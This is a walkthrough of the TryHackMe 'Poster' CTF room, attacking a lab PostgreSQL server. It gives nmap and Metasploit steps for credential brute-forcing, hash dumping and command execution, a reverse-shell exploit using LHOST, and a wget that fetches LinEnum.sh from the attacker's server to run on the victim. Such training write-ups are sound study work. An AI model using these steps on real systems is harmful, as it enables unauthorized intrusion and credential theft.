Try Hack Me: Poster

The skills to be tested and needed to solve this room are: rdbms, postgressql, nmap, Metaspolit, privilege escalation, SSH, find and enumeration.

This room was released today, 9/11/2020. Shout-out to the room creator, @stuxnet. You can access the room at https://tryhackme.com/roomposter

I was assigned a target IP address of 10.10.66.128. You will be assigned a different IP address, so double check your entries when following this walk-through.

The requirements to complete this room are:

What is the rdbms installed on the server?
- p*********
What port is the rdbms running on?
- 5***
Metasploit contains a variety of modules that can be used to enumerate in multiple rdbms, making it easy to gather valuable information.
- No answer needed
After starting Metasploit, search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the modules (starting with auxiliary)?
- auxiliary/s******/p*******/p*******_*****
What are the credentials you found?
- p*******:p*******
What is the full path of the module that allows you to execute commands with the proper user credentials (starting with auxiliary)?
- auxiliary/a****/p*******/p*******_***
Based on the results of #6, what is the rdbms version installed on the server?
- 9.*.**
What is the full path of the module that allows for dumping user hashes (starting with auxiliary)?
- auxiliary/s******/p*******/p*******_********
How many user hashes does the module dump?
- *
What is the full path of the module (starting with auxiliary) that allows an authenticated user to view files of their choosing on the server?
- auxiliary/a****/p*******/p*******_********
What is the full path of the module that allows arbitrary command execution with the proper user credentials (starting with exploit)?
- exploit/m****/p*******/p*******_****_****_*******_***_****
Compromise the machine and locate user.txt
- THM{p*********_****_************n}
Escalate privileges and obtain root.txt
- THM{c*******_***_****_***_****_****_**********s}

Steps:

Scan the machine using nmap. Type nmap -sC -sV 10.10.66.128

-sC – to scan using the default nmap scripts
-sV – to pull version information of open ports found during the scan

The screenshot above answers the following questions:

What is the rdbms installed on the server?
- p*********
What port is the rdbms running on?
- 5***

2. Start Metasploit by typing msfconsole

3. Search for an associated auxiliary module that allows us to enumerate user credentials. Type grep auxiliary search postgres

grep auxiliary – we want to specifically grab modules that has the word auxiliary in it
search postgres – now that we know that we are working on postgresql, it just makes sense to look for postgres modules

The screenshot above answers the question below. Since we are being asked about “user credentials”, it makes sense to pick the module used for PostgreSQL login utility:

Search for an associated auxiliary module that allows us to enumerate user credentials. What is the full path of the module?
- auxiliary/s******/p*******/p*******_*****

4. To use the module, type use 7 and hit enter

5. Set the needed options. On this step, we just need to set the RHOSTS. Type set RHOSTS 10.10.66.128 and hit enter. Then type run to start the the scan

The screenshot above answers the next question:

What are the credentials found?
- p*******:p*******

6. Search for a module that allows you to execute commands with proper user credentials. What is the full path of the module? Type grep auxiliary search postgres

The screenshot above answers the question below:

What is the full path of the module that allows you to execute commands with proper user credentials?
- auxiliary/a****/p*******/p*******_***

7. To use the module, type use 3 and hit enter

8. Set the needed options. On this step, we just need to set the RHOSTS. Type set RHOSTS 10.10.66.128 and hit enter. Next type, set PASSWORD p*******. Then type run to start the the scan

The screenshot above answers the next question:

Based on the results of #6, what is the rdbms version installed on the server?
- 9.*.**

9. Search for a module that allows for dumping user hashes. What is the full path of the module? Type grep auxiliary search postgres

The screenshot above answers the next question:

What is the full path of the module that allows for dumping user hashes?
- auxiliary/s******/p*******/p*******_********

10. To use the module, type use 6 and hit enter

11. Set the needed options. On this step, we just need to set the RHOSTS. Type set RHOSTS 10.10.66.128 and hit enter. Next type, set PASSWORD p*******. Then type run to start the the scan

The screenshot above answers the next question:

How many user hashes does the module dump?
- *

12. Search for a module that allows authenticated user to view files of their choosing on the server. What is the full path of the module? Type grep auxiliary search postgres

13. Search for an exploit that allows arbitrary command execution with the proper user credentials. What is the full path of the module? Type grep exploit search postgres

14. To use the module, type, use 13

15. Set the needed options. On this step, we just need to set the RHOSTS. Type set RHOSTS 10.10.66.128 and hit enter. Type LHOST 10.2.5.154 and hit enter. Remember, for the LHOST, use the IP address of your VPN network adapter, most likely tun0 adapter. Next type, set PASSWORD p*******. Then type exploit to start the the scan

16. Transfer LinEnum.sh to the victim machine. First, from our attack machine start our local web server by typing python3 -m http.server 9000

17. On the victim machine, let’s download the LinEnum.sh by typing wget http://10.2.5.154:9000/LinEnum.sh Remember to use your attack machine’s IP address to download the file

18. Run LinEnum.sh by typing ./LinEnum.sh and hit enter. There are two files that caught my attention. First was /home/dark/credentials.txt and /var/www/html/config.php. The credentials.txt contains a valid credential but it was a deadend, but the config.php file contains user credential to read user.txt